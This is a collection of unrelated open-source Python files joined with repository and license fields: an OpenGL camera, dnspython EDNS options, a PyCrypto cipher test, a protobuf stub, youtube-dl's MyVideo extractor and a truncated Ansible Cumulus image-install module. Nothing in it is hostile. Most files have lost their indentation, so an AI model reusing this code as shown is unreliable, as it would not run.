eye = self.eye.value + Vector3(uniform(0, 1), uniform(0, 1), uniform(0, 1)) * self.ofs.value
center = eye + self.vec.value
up = self.up.value
gluLookAt(eye.x, eye.y, eye.z,
center.x, center.y, center.z,
up.x, up.y, up.z)
glGetDoublev(GL_MODELVIEW_MATRIX, self.modelview)
glGetDoublev(GL_PROJECTION_MATRIX, self.projection)
def _unproject(self, x, y, z):
gluUnProject(x, y, z,
self.modelview,
self.projection,
self.viewport,
self.unproj[0],
self.unproj[1],
self.unproj[2]
)
return Vector3(*[v.value for v in self.unproj])
def unproject(self, (x, y)):
# http://stackoverflow.com/questions/9406269/object-picking-with-ray-casting
l0 = self._unproject(x, y, 0.1)
l1 = self._unproject(x, y, 0.9)
ld = l1 - l0
# http://en.wikipedia.org/wiki/Line%E2%80%93plane_intersection
# assuming that p0 = (0, 0, 0), and n = (0, 0, -1)
d = -l0.z / ld.z
p = l0 + ld * d
return p
| mit |
cricketclubucd/davisdragons | platform-tools/systrace/catapult/telemetry/third_party/web-page-replay/third_party/dns/edns.py | 248 | 4312 | # Copyright (C) 2009 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""EDNS Options"""
NSID = 3
class Option(object):
"""Base class for all EDNS option types.
"""
def __init__(self, otype):
"""Initialize an option.
        @param otype: The option type
        @type otype: int
"""
self.otype = otype
def to_wire(self, file):
"""Convert an option to wire format.
"""
raise NotImplementedError
def from_wire(cls, otype, wire, current, olen):
"""Build an EDNS option object from wire format
@param otype: The option type
@type otype: int
@param wire: The wire-format message
@type wire: string
        @param current: The offset in wire of the beginning of the rdata.
@type current: int
@param olen: The length of the wire-format option data
@type olen: int
        @rtype: dns.edns.Option instance"""
raise NotImplementedError
from_wire = classmethod(from_wire)
def _cmp(self, other):
"""Compare an ENDS option with another option of the same type.
Return < 0 if self < other, 0 if self == other, and > 0 if self > other.
"""
raise NotImplementedError
def __eq__(self, other):
if not isinstance(other, Option):
return False
if self.otype != other.otype:
return False
return self._cmp(other) == 0
def __ne__(self, other):
if not isinstance(other, Option):
return False
if self.otype != other.otype:
return False
return self._cmp(other) != 0
def __lt__(self, other):
if not isinstance(other, Option) or \
self.otype != other.otype:
return NotImplemented
return self._cmp(other) < 0
def __le__(self, other):
if not isinstance(other, Option) or \
self.otype != other.otype:
return NotImplemented
return self._cmp(other) <= 0
def __ge__(self, other):
if not isinstance(other, Option) or \
self.otype != other.otype:
return NotImplemented
return self._cmp(other) >= 0
def __gt__(self, other):
if not isinstance(other, Option) or \
self.otype != other.otype:
return NotImplemented
return self._cmp(other) > 0
class GenericOption(Option):
"""Generate Rdata Class
This class is used for EDNS option types for which we have no better
implementation.
"""
def __init__(self, otype, data):
super(GenericOption, self).__init__(otype)
self.data = data
def to_wire(self, file):
file.write(self.data)
def from_wire(cls, otype, wire, current, olen):
return cls(otype, wire[current : current + olen])
from_wire = classmethod(from_wire)
def _cmp(self, other):
return cmp(self.data, other.data)
_type_to_class = {
}
def get_option_class(otype):
cls = _type_to_class.get(otype)
if cls is None:
cls = GenericOption
return cls
def option_from_wire(otype, wire, current, olen):
"""Build an EDNS option object from wire format
@param otype: The option type
@type otype: int
@param wire: The wire-format message
@type wire: string
    @param current: The offset in wire of the beginning of the rdata.
@type current: int
@param olen: The length of the wire-format option data
@type olen: int
@rtype: dns.ends.Option instance"""
cls = get_option_class(otype)
return cls.from_wire(otype, wire, current, olen)
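# Illustrative round-trip (left as a comment so importing this module stays
# side-effect free); the payload below is arbitrary:
#
#     opt = GenericOption(NSID, 'example')
#     same = option_from_wire(NSID, opt.data, 0, len(opt.data))
#     assert same == opt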
| mit |
yawnosnorous/python-for-android | python-build/python-libs/gdata/src/gdata/Crypto/Util/test.py | 228 | 18297 | #
# test.py : Functions used for testing the modules
#
# Part of the Python Cryptography Toolkit
#
# Distribute and use freely; there are no restrictions on further
# dissemination and usage except those imposed by the laws of your
# country of residence. This software is provided "as is" without
# warranty of fitness for use or suitability for any purpose, express
# or implied. Use at your own risk or not at all.
#
__revision__ = "$Id: test.py,v 1.16 2004/08/13 22:24:18 akuchling Exp $"
import binascii
import string
import testdata
from Crypto.Cipher import *
def die(string):
import sys
print '***ERROR: ', string
# sys.exit(0) # Will default to continuing onward...
def print_timing (size, delta, verbose):
if verbose:
if delta == 0:
print 'Unable to measure time -- elapsed time too small'
else:
print '%.2f K/sec' % (size/delta)
def exerciseBlockCipher(cipher, verbose):
import string, time
try:
ciph = eval(cipher)
except NameError:
print cipher, 'module not available'
return None
print cipher+ ':'
str='1' # Build 128K of test data
for i in xrange(0, 17):
str=str+str
if ciph.key_size==0: ciph.key_size=16
password = 'password12345678Extra text for password'[0:ciph.key_size]
IV = 'Test IV Test IV Test IV Test'[0:ciph.block_size]
if verbose: print ' ECB mode:',
obj=ciph.new(password, ciph.MODE_ECB)
if obj.block_size != ciph.block_size:
die("Module and cipher object block_size don't match")
text='1234567812345678'[0:ciph.block_size]
c=obj.encrypt(text)
if (obj.decrypt(c)!=text): die('Error encrypting "'+text+'"')
text='KuchlingKuchling'[0:ciph.block_size]
c=obj.encrypt(text)
if (obj.decrypt(c)!=text): die('Error encrypting "'+text+'"')
text='NotTodayNotEver!'[0:ciph.block_size]
c=obj.encrypt(text)
if (obj.decrypt(c)!=text): die('Error encrypting "'+text+'"')
start=time.time()
s=obj.encrypt(str)
s2=obj.decrypt(s)
end=time.time()
if (str!=s2):
die('Error in resulting plaintext from ECB mode')
print_timing(256, end-start, verbose)
del obj
if verbose: print ' CFB mode:',
obj1=ciph.new(password, ciph.MODE_CFB, IV)
obj2=ciph.new(password, ciph.MODE_CFB, IV)
start=time.time()
ciphertext=obj1.encrypt(str[0:65536])
plaintext=obj2.decrypt(ciphertext)
end=time.time()
if (plaintext!=str[0:65536]):
die('Error in resulting plaintext from CFB mode')
print_timing(64, end-start, verbose)
del obj1, obj2
if verbose: print ' CBC mode:',
obj1=ciph.new(password, ciph.MODE_CBC, IV)
obj2=ciph.new(password, ciph.MODE_CBC, IV)
start=time.time()
ciphertext=obj1.encrypt(str)
plaintext=obj2.decrypt(ciphertext)
end=time.time()
if (plaintext!=str):
die('Error in resulting plaintext from CBC mode')
print_timing(256, end-start, verbose)
del obj1, obj2
if verbose: print ' PGP mode:',
obj1=ciph.new(password, ciph.MODE_PGP, IV)
obj2=ciph.new(password, ciph.MODE_PGP, IV)
start=time.time()
ciphertext=obj1.encrypt(str)
plaintext=obj2.decrypt(ciphertext)
end=time.time()
if (plaintext!=str):
die('Error in resulting plaintext from PGP mode')
print_timing(256, end-start, verbose)
del obj1, obj2
if verbose: print ' OFB mode:',
obj1=ciph.new(password, ciph.MODE_OFB, IV)
obj2=ciph.new(password, ciph.MODE_OFB, IV)
start=time.time()
ciphertext=obj1.encrypt(str)
plaintext=obj2.decrypt(ciphertext)
end=time.time()
if (plaintext!=str):
die('Error in resulting plaintext from OFB mode')
print_timing(256, end-start, verbose)
del obj1, obj2
def counter(length=ciph.block_size):
return length * 'a'
if verbose: print ' CTR mode:',
obj1=ciph.new(password, ciph.MODE_CTR, counter=counter)
obj2=ciph.new(password, ciph.MODE_CTR, counter=counter)
start=time.time()
ciphertext=obj1.encrypt(str)
plaintext=obj2.decrypt(ciphertext)
end=time.time()
if (plaintext!=str):
die('Error in resulting plaintext from CTR mode')
print_timing(256, end-start, verbose)
del obj1, obj2
# Test the IV handling
if verbose: print ' Testing IV handling'
obj1=ciph.new(password, ciph.MODE_CBC, IV)
plaintext='Test'*(ciph.block_size/4)*3
ciphertext1=obj1.encrypt(plaintext)
obj1.IV=IV
ciphertext2=obj1.encrypt(plaintext)
if ciphertext1!=ciphertext2:
die('Error in setting IV')
# Test keyword arguments
obj1=ciph.new(key=password)
obj1=ciph.new(password, mode=ciph.MODE_CBC)
obj1=ciph.new(mode=ciph.MODE_CBC, key=password)
obj1=ciph.new(IV=IV, mode=ciph.MODE_CBC, key=password)
return ciph
def exerciseStreamCipher(cipher, verbose):
import string, time
try:
ciph = eval(cipher)
except (NameError):
print cipher, 'module not available'
return None
print cipher + ':',
str='1' # Build 128K of test data
for i in xrange(0, 17):
str=str+str
key_size = ciph.key_size or 16
password = 'password12345678Extra text for password'[0:key_size]
obj1=ciph.new(password)
obj2=ciph.new(password)
if obj1.block_size != ciph.block_size:
die("Module and cipher object block_size don't match")
if obj1.key_size != ciph.key_size:
die("Module and cipher object key_size don't match")
text='1234567812345678Python'
c=obj1.encrypt(text)
if (obj2.decrypt(c)!=text): die('Error encrypting "'+text+'"')
text='B1FF I2 A R3A11Y |<00L D00D!!!!!'
c=obj1.encrypt(text)
if (obj2.decrypt(c)!=text): die('Error encrypting "'+text+'"')
text='SpamSpamSpamSpamSpamSpamSpamSpamSpam'
c=obj1.encrypt(text)
if (obj2.decrypt(c)!=text): die('Error encrypting "'+text+'"')
start=time.time()
s=obj1.encrypt(str)
str=obj2.decrypt(s)
end=time.time()
print_timing(256, end-start, verbose)
del obj1, obj2
return ciph
def TestStreamModules(args=['arc4', 'XOR'], verbose=1):
import sys, string
args=map(string.lower, args)
if 'arc4' in args:
# Test ARC4 stream cipher
arc4=exerciseStreamCipher('ARC4', verbose)
if (arc4!=None):
for entry in testdata.arc4:
key,plain,cipher=entry
key=binascii.a2b_hex(key)
plain=binascii.a2b_hex(plain)
cipher=binascii.a2b_hex(cipher)
obj=arc4.new(key)
ciphertext=obj.encrypt(plain)
if (ciphertext!=cipher):
die('ARC4 failed on entry '+`entry`)
if 'xor' in args:
# Test XOR stream cipher
XOR=exerciseStreamCipher('XOR', verbose)
if (XOR!=None):
for entry in testdata.xor:
key,plain,cipher=entry
key=binascii.a2b_hex(key)
plain=binascii.a2b_hex(plain)
cipher=binascii.a2b_hex(cipher)
obj=XOR.new(key)
ciphertext=obj.encrypt(plain)
if (ciphertext!=cipher):
die('XOR failed on entry '+`entry`)
def TestBlockModules(args=['aes', 'arc2', 'des', 'blowfish', 'cast', 'des3',
'idea', 'rc5'],
verbose=1):
import string
args=map(string.lower, args)
if 'aes' in args:
ciph=exerciseBlockCipher('AES', verbose) # AES
if (ciph!=None):
if verbose: print ' Verifying against test suite...'
for entry in testdata.aes:
key,plain,cipher=entry
key=binascii.a2b_hex(key)
plain=binascii.a2b_hex(plain)
cipher=binascii.a2b_hex(cipher)
obj=ciph.new(key, ciph.MODE_ECB)
ciphertext=obj.encrypt(plain)
if (ciphertext!=cipher):
die('AES failed on entry '+`entry`)
for i in ciphertext:
if verbose: print hex(ord(i)),
if verbose: print
for entry in testdata.aes_modes:
mode, key, plain, cipher, kw = entry
key=binascii.a2b_hex(key)
plain=binascii.a2b_hex(plain)
cipher=binascii.a2b_hex(cipher)
obj=ciph.new(key, mode, **kw)
obj2=ciph.new(key, mode, **kw)
ciphertext=obj.encrypt(plain)
if (ciphertext!=cipher):
die('AES encrypt failed on entry '+`entry`)
for i in ciphertext:
if verbose: print hex(ord(i)),
if verbose: print
plain2=obj2.decrypt(ciphertext)
if plain2!=plain:
die('AES decrypt failed on entry '+`entry`)
for i in plain2:
if verbose: print hex(ord(i)),
if verbose: print
if 'arc2' in args:
ciph=exerciseBlockCipher('ARC2', verbose) # Alleged RC2
if (ciph!=None):
if verbose: print ' Verifying against test suite...'
for entry in testdata.arc2:
key,plain,cipher=entry
key=binascii.a2b_hex(key)
plain=binascii.a2b_hex(plain)
cipher=binascii.a2b_hex(cipher)
obj=ciph.new(key, ciph.MODE_ECB)
ciphertext=obj.encrypt(plain)
if (ciphertext!=cipher):
die('ARC2 failed on entry '+`entry`)
for i in ciphertext:
if verbose: print hex(ord(i)),
print
if 'blowfish' in args:
ciph=exerciseBlockCipher('Blowfish',verbose)# Bruce Schneier's Blowfish cipher
if (ciph!=None):
if verbose: print ' Verifying against test suite...'
for entry in testdata.blowfish:
key,plain,cipher=entry
key=binascii.a2b_hex(key)
plain=binascii.a2b_hex(plain)
cipher=binascii.a2b_hex(cipher)
obj=ciph.new(key, ciph.MODE_ECB)
ciphertext=obj.encrypt(plain)
if (ciphertext!=cipher):
die('Blowfish failed on entry '+`entry`)
for i in ciphertext:
if verbose: print hex(ord(i)),
if verbose: print
if 'cast' in args:
ciph=exerciseBlockCipher('CAST', verbose) # CAST-128
if (ciph!=None):
if verbose: print ' Verifying against test suite...'
for entry in testdata.cast:
key,plain,cipher=entry
key=binascii.a2b_hex(key)
plain=binascii.a2b_hex(plain)
cipher=binascii.a2b_hex(cipher)
obj=ciph.new(key, ciph.MODE_ECB)
ciphertext=obj.encrypt(plain)
if (ciphertext!=cipher):
die('CAST failed on entry '+`entry`)
for i in ciphertext:
if verbose: print hex(ord(i)),
if verbose: print
if 0:
# The full-maintenance test; it requires 4 million encryptions,
# and correspondingly is quite time-consuming. I've disabled
# it; it's faster to compile block/cast.c with -DTEST and run
# the resulting program.
a = b = '\x01\x23\x45\x67\x12\x34\x56\x78\x23\x45\x67\x89\x34\x56\x78\x9A'
for i in range(0, 1000000):
obj = cast.new(b, cast.MODE_ECB)
a = obj.encrypt(a[:8]) + obj.encrypt(a[-8:])
obj = cast.new(a, cast.MODE_ECB)
b = obj.encrypt(b[:8]) + obj.encrypt(b[-8:])
if a!="\xEE\xA9\xD0\xA2\x49\xFD\x3B\xA6\xB3\x43\x6F\xB8\x9D\x6D\xCA\x92":
if verbose: print 'CAST test failed: value of "a" doesn\'t match'
if b!="\xB2\xC9\x5E\xB0\x0C\x31\xAD\x71\x80\xAC\x05\xB8\xE8\x3D\x69\x6E":
if verbose: print 'CAST test failed: value of "b" doesn\'t match'
if 'des' in args:
# Test/benchmark DES block cipher
des=exerciseBlockCipher('DES', verbose)
if (des!=None):
# Various tests taken from the DES library packaged with Kerberos V4
obj=des.new(binascii.a2b_hex('0123456789abcdef'), des.MODE_ECB)
s=obj.encrypt('Now is t')
if (s!=binascii.a2b_hex('3fa40e8a984d4815')):
die('DES fails test 1')
obj=des.new(binascii.a2b_hex('08192a3b4c5d6e7f'), des.MODE_ECB)
s=obj.encrypt('\000\000\000\000\000\000\000\000')
if (s!=binascii.a2b_hex('25ddac3e96176467')):
die('DES fails test 2')
obj=des.new(binascii.a2b_hex('0123456789abcdef'), des.MODE_CBC,
binascii.a2b_hex('1234567890abcdef'))
s=obj.encrypt("Now is the time for all ")
if (s!=binascii.a2b_hex('e5c7cdde872bf27c43e934008c389c0f683788499a7c05f6')):
die('DES fails test 3')
obj=des.new(binascii.a2b_hex('0123456789abcdef'), des.MODE_CBC,
binascii.a2b_hex('fedcba9876543210'))
s=obj.encrypt("7654321 Now is the time for \000\000\000\000")
if (s!=binascii.a2b_hex("ccd173ffab2039f4acd8aefddfd8a1eb468e91157888ba681d269397f7fe62b4")):
die('DES fails test 4')
del obj,s
# R. Rivest's test: see http://theory.lcs.mit.edu/~rivest/destest.txt
x=binascii.a2b_hex('9474B8E8C73BCA7D')
for i in range(0, 16):
obj=des.new(x, des.MODE_ECB)
if (i & 1): x=obj.decrypt(x)
else: x=obj.encrypt(x)
if x!=binascii.a2b_hex('1B1A2DDB4C642438'):
die("DES fails Rivest's test")
if verbose: print ' Verifying against test suite...'
for entry in testdata.des:
key,plain,cipher=entry
key=binascii.a2b_hex(key)
plain=binascii.a2b_hex(plain)
cipher=binascii.a2b_hex(cipher)
obj=des.new(key, des.MODE_ECB)
ciphertext=obj.encrypt(plain)
if (ciphertext!=cipher):
die('DES failed on entry '+`entry`)
for entry in testdata.des_cbc:
key, iv, plain, cipher=entry
key, iv, cipher=binascii.a2b_hex(key),binascii.a2b_hex(iv),binascii.a2b_hex(cipher)
obj1=des.new(key, des.MODE_CBC, iv)
obj2=des.new(key, des.MODE_CBC, iv)
ciphertext=obj1.encrypt(plain)
if (ciphertext!=cipher):
die('DES CBC mode failed on entry '+`entry`)
if 'des3' in args:
ciph=exerciseBlockCipher('DES3', verbose) # Triple DES
if (ciph!=None):
if verbose: print ' Verifying against test suite...'
for entry in testdata.des3:
key,plain,cipher=entry
key=binascii.a2b_hex(key)
plain=binascii.a2b_hex(plain)
cipher=binascii.a2b_hex(cipher)
obj=ciph.new(key, ciph.MODE_ECB)
ciphertext=obj.encrypt(plain)
if (ciphertext!=cipher):
die('DES3 failed on entry '+`entry`)
for i in ciphertext:
if verbose: print hex(ord(i)),
if verbose: print
for entry in testdata.des3_cbc:
key, iv, plain, cipher=entry
key, iv, cipher=binascii.a2b_hex(key),binascii.a2b_hex(iv),binascii.a2b_hex(cipher)
obj1=ciph.new(key, ciph.MODE_CBC, iv)
obj2=ciph.new(key, ciph.MODE_CBC, iv)
ciphertext=obj1.encrypt(plain)
if (ciphertext!=cipher):
die('DES3 CBC mode failed on entry '+`entry`)
if 'idea' in args:
ciph=exerciseBlockCipher('IDEA', verbose) # IDEA block cipher
if (ciph!=None):
if verbose: print ' Verifying against test suite...'
for entry in testdata.idea:
key,plain,cipher=entry
key=binascii.a2b_hex(key)
plain=binascii.a2b_hex(plain)
cipher=binascii.a2b_hex(cipher)
obj=ciph.new(key, ciph.MODE_ECB)
ciphertext=obj.encrypt(plain)
if (ciphertext!=cipher):
die('IDEA failed on entry '+`entry`)
if 'rc5' in args:
# Ronald Rivest's RC5 algorithm
ciph=exerciseBlockCipher('RC5', verbose)
if (ciph!=None):
if verbose: print ' Verifying against test suite...'
for entry in testdata.rc5:
key,plain,cipher=entry
key=binascii.a2b_hex(key)
plain=binascii.a2b_hex(plain)
cipher=binascii.a2b_hex(cipher)
obj=ciph.new(key[4:], ciph.MODE_ECB,
version =ord(key[0]),
word_size=ord(key[1]),
rounds =ord(key[2]) )
ciphertext=obj.encrypt(plain)
if (ciphertext!=cipher):
die('RC5 failed on entry '+`entry`)
for i in ciphertext:
if verbose: print hex(ord(i)),
if verbose: print
| apache-2.0 |
lukeiwanski/tensorflow | tensorflow/contrib/feature_column/__init__.py | 42 | 1502 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Experimental utilities for tf.feature_column."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import,line-too-long,wildcard-import
from tensorflow.contrib.feature_column.python.feature_column.sequence_feature_column import *
from tensorflow.python.util.all_util import remove_undocumented
# pylint: enable=unused-import,line-too-long,wildcard-import
_allowed_symbols = [
'sequence_categorical_column_with_hash_bucket',
'sequence_categorical_column_with_identity',
'sequence_categorical_column_with_vocabulary_list',
'sequence_categorical_column_with_vocabulary_file',
'sequence_input_layer',
'sequence_numeric_column',
]
remove_undocumented(__name__, allowed_exception_list=_allowed_symbols)
| apache-2.0 |
PokeHunterProject/pogom-updated | pogom/pgoapi/protos/POGOProtos/Map/Fort/FortRenderingType_pb2.py | 16 | 1781 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: POGOProtos/Map/Fort/FortRenderingType.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf.internal import enum_type_wrapper
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='POGOProtos/Map/Fort/FortRenderingType.proto',
package='POGOProtos.Map.Fort',
syntax='proto3',
serialized_pb=_b('\n+POGOProtos/Map/Fort/FortRenderingType.proto\x12\x13POGOProtos.Map.Fort*3\n\x11\x46ortRenderingType\x12\x0b\n\x07\x44\x45\x46\x41ULT\x10\x00\x12\x11\n\rINTERNAL_TEST\x10\x01\x62\x06proto3')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_FORTRENDERINGTYPE = _descriptor.EnumDescriptor(
name='FortRenderingType',
full_name='POGOProtos.Map.Fort.FortRenderingType',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='DEFAULT', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INTERNAL_TEST', index=1, number=1,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=68,
serialized_end=119,
)
_sym_db.RegisterEnumDescriptor(_FORTRENDERINGTYPE)
FortRenderingType = enum_type_wrapper.EnumTypeWrapper(_FORTRENDERINGTYPE)
DEFAULT = 0
INTERNAL_TEST = 1
DESCRIPTOR.enum_types_by_name['FortRenderingType'] = _FORTRENDERINGTYPE
# @@protoc_insertion_point(module_scope)
| mit |
durai145/youtube-dl | youtube_dl/extractor/myvideo.py | 87 | 6273 | from __future__ import unicode_literals
import binascii
import base64
import hashlib
import re
import json
from .common import InfoExtractor
from ..compat import (
compat_ord,
compat_urllib_parse,
compat_urllib_parse_unquote,
compat_urllib_request,
)
from ..utils import (
ExtractorError,
)
class MyVideoIE(InfoExtractor):
_VALID_URL = r'http://(?:www\.)?myvideo\.de/(?:[^/]+/)?watch/(?P<id>[0-9]+)/[^?/]+.*'
IE_NAME = 'myvideo'
_TEST = {
'url': 'http://www.myvideo.de/watch/8229274/bowling_fail_or_win',
'md5': '2d2753e8130479ba2cb7e0a37002053e',
'info_dict': {
'id': '8229274',
'ext': 'flv',
'title': 'bowling-fail-or-win',
}
}
# Original Code from: https://github.com/dersphere/plugin.video.myvideo_de.git
# Released into the Public Domain by Tristan Fischer on 2013-05-19
# https://github.com/rg3/youtube-dl/pull/842
def __rc4crypt(self, data, key):
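        # plain RC4: the first loop is the key-scheduling algorithm (KSA) over
        # `box`, the second generates the keystream (PRGA) and XORs it with data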
x = 0
box = list(range(256))
for i in list(range(256)):
x = (x + box[i] + compat_ord(key[i % len(key)])) % 256
box[i], box[x] = box[x], box[i]
x = 0
y = 0
out = ''
for char in data:
x = (x + 1) % 256
y = (y + box[x]) % 256
box[x], box[y] = box[y], box[x]
out += chr(compat_ord(char) ^ box[(box[x] + box[y]) % 256])
return out
def __md5(self, s):
return hashlib.md5(s).hexdigest().encode()
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id = mobj.group('id')
GK = (
b'WXpnME1EZGhNRGhpTTJNM01XVmhOREU0WldNNVpHTTJOakpt'
b'TW1FMU5tVTBNR05pWkRaa05XRXhNVFJoWVRVd1ptSXhaVEV3'
b'TnpsbA0KTVRkbU1tSTRNdz09'
)
# Get video webpage
webpage_url = 'http://www.myvideo.de/watch/%s' % video_id
webpage = self._download_webpage(webpage_url, video_id)
mobj = re.search('source src=\'(.+?)[.]([^.]+)\'', webpage)
if mobj is not None:
self.report_extraction(video_id)
video_url = mobj.group(1) + '.flv'
video_title = self._html_search_regex('<title>([^<]+)</title>',
webpage, 'title')
return {
'id': video_id,
'url': video_url,
'title': video_title,
}
mobj = re.search(r'data-video-service="/service/data/video/%s/config' % video_id, webpage)
if mobj is not None:
request = compat_urllib_request.Request('http://www.myvideo.de/service/data/video/%s/config' % video_id, '')
response = self._download_webpage(request, video_id,
'Downloading video info')
info = json.loads(base64.b64decode(response).decode('utf-8'))
return {
'id': video_id,
'title': info['title'],
'url': info['streaming_url'].replace('rtmpe', 'rtmpt'),
'play_path': info['filename'],
'ext': 'flv',
'thumbnail': info['thumbnail'][0]['url'],
}
# try encxml
mobj = re.search('var flashvars={(.+?)}', webpage)
if mobj is None:
raise ExtractorError('Unable to extract video')
params = {}
encxml = ''
sec = mobj.group(1)
for (a, b) in re.findall('(.+?):\'(.+?)\',?', sec):
if not a == '_encxml':
params[a] = b
else:
encxml = compat_urllib_parse_unquote(b)
if not params.get('domain'):
params['domain'] = 'www.myvideo.de'
xmldata_url = '%s?%s' % (encxml, compat_urllib_parse.urlencode(params))
if 'flash_playertype=MTV' in xmldata_url:
self._downloader.report_warning('avoiding MTV player')
xmldata_url = (
'http://www.myvideo.de/dynamic/get_player_video_xml.php'
'?flash_playertype=D&ID=%s&_countlimit=4&autorun=yes'
) % video_id
# get enc data
enc_data = self._download_webpage(xmldata_url, video_id).split('=')[1]
enc_data_b = binascii.unhexlify(enc_data)
sk = self.__md5(
base64.b64decode(base64.b64decode(GK)) +
self.__md5(
str(video_id).encode('utf-8')
)
)
dec_data = self.__rc4crypt(enc_data_b, sk)
# extracting infos
self.report_extraction(video_id)
video_url = None
mobj = re.search('connectionurl=\'(.*?)\'', dec_data)
if mobj:
video_url = compat_urllib_parse_unquote(mobj.group(1))
if 'myvideo2flash' in video_url:
self.report_warning(
'Rewriting URL to use unencrypted rtmp:// ...',
video_id)
video_url = video_url.replace('rtmpe://', 'rtmp://')
if not video_url:
# extract non rtmp videos
mobj = re.search('path=\'(http.*?)\' source=\'(.*?)\'', dec_data)
if mobj is None:
raise ExtractorError('unable to extract url')
video_url = compat_urllib_parse_unquote(mobj.group(1)) + compat_urllib_parse_unquote(mobj.group(2))
video_file = self._search_regex('source=\'(.*?)\'', dec_data, 'video file')
video_file = compat_urllib_parse_unquote(video_file)
if not video_file.endswith('f4m'):
ppath, prefix = video_file.split('.')
video_playpath = '%s:%s' % (prefix, ppath)
else:
video_playpath = ''
video_swfobj = self._search_regex('swfobject.embedSWF\(\'(.+?)\'', webpage, 'swfobj')
video_swfobj = compat_urllib_parse_unquote(video_swfobj)
video_title = self._html_search_regex("<h1(?: class='globalHd')?>(.*?)</h1>",
webpage, 'title')
return {
'id': video_id,
'url': video_url,
'tc_url': video_url,
'title': video_title,
'ext': 'flv',
'play_path': video_playpath,
'player_url': video_swfobj,
}
| unlicense |
nwiizo/workspace_2017 | ansible-modules-core/network/cumulus/cl_img_install.py | 12 | 10956 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2016, Cumulus Networks <[email protected]>
#
# This file is part of Ansible
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'version': '1.0'}
DOCUMENTATION = '''
---
module: cl_img_install
version_added: "2.1"
author: "Cumulus Networks (@CumulusLinux)"
short_description: Install a different Cumulus Linux version.
description:
- install a different version of Cumulus Linux in the inactive slot. For
more details go the Image Management User Guide at
U(http://docs.cumulusnetworks.com/).
options:
src:
description:
- The full path to the Cumulus Linux binary image. Can be a local path,
http or https URL. If the code version is in the name of the file,
the module will assume this is the version of code you wish to
install.
required: true
version:
description:
- Inform the module of the exact version one is installing. This
overrides the automatic check of version in the file name. For
example, if the binary file name is called CumulusLinux-2.2.3.bin,
and version is set to '2.5.0', then the module will assume it is
installing '2.5.0' not '2.2.3'. If version is not included, then
the module will assume '2.2.3' is the version to install.
default: None
required: false
switch_slot:
description:
- Switch slots after installing the image.
To run the installed code, reboot the switch.
choices: ['yes', 'no']
default: 'no'
required: false
requirements: ["Cumulus Linux OS"]
'''
EXAMPLES = '''
Example playbook entries using the cl_img_install module
## Download and install the image from a webserver.
- name: Install image using http url. Switch slots so the subsequent reload will load the new version
cl_img_install:
version: 2.0.1
src: http://10.1.1.1/CumulusLinux-2.0.1.bin
switch_slot: yes
## Copy the software from the ansible server to the switch.
## The module will get the code version from the filename
## The code will be installed in the alternate slot but the slot will not be primary
## A subsequent reload will not run the new code
- name: Download cumulus linux to local system
get_url:
    url: ftp://cumuluslinux.bin
dest: /root/CumulusLinux-2.0.1.bin
- name: Install image from local filesystem. Get version from the filename.
cl_img_install:
src: /root/CumulusLinux-2.0.1.bin
## If the image name has been changed from the original name, use the `version` option
## to inform the module exactly what code version is being installed
- name: Download cumulus linux to local system
get_url:
    url: ftp://CumulusLinux-2.0.1.bin
dest: /root/image.bin
- name: install image and switch slots. only reboot needed
cl_img_install:
version: 2.0.1
src: /root/image.bin
switch_slot: yes
'''
RETURN = '''
changed:
description: whether the interface was changed
returned: changed
type: bool
sample: True
msg:
description: human-readable report of success or failure
returned: always
type: string
sample: "interface bond0 config updated"
'''
def check_url(module, url):
parsed_url = urlparse(url)
if len(parsed_url.path) > 0:
sch = parsed_url.scheme
if (sch == 'http' or sch == 'https' or len(parsed_url.scheme) == 0):
return True
module.fail_json(msg="Image Path URL. Wrong Format %s" % (url))
return False
def run_cl_cmd(module, cmd, check_rc=True):
try:
(rc, out, err) = module.run_command(cmd, check_rc=check_rc)
except Exception:
e = get_exception()
module.fail_json(msg=e.strerror)
# trim last line as it is always empty
ret = out.splitlines()
return ret
def get_slot_info(module):
slots = {}
slots['1'] = {}
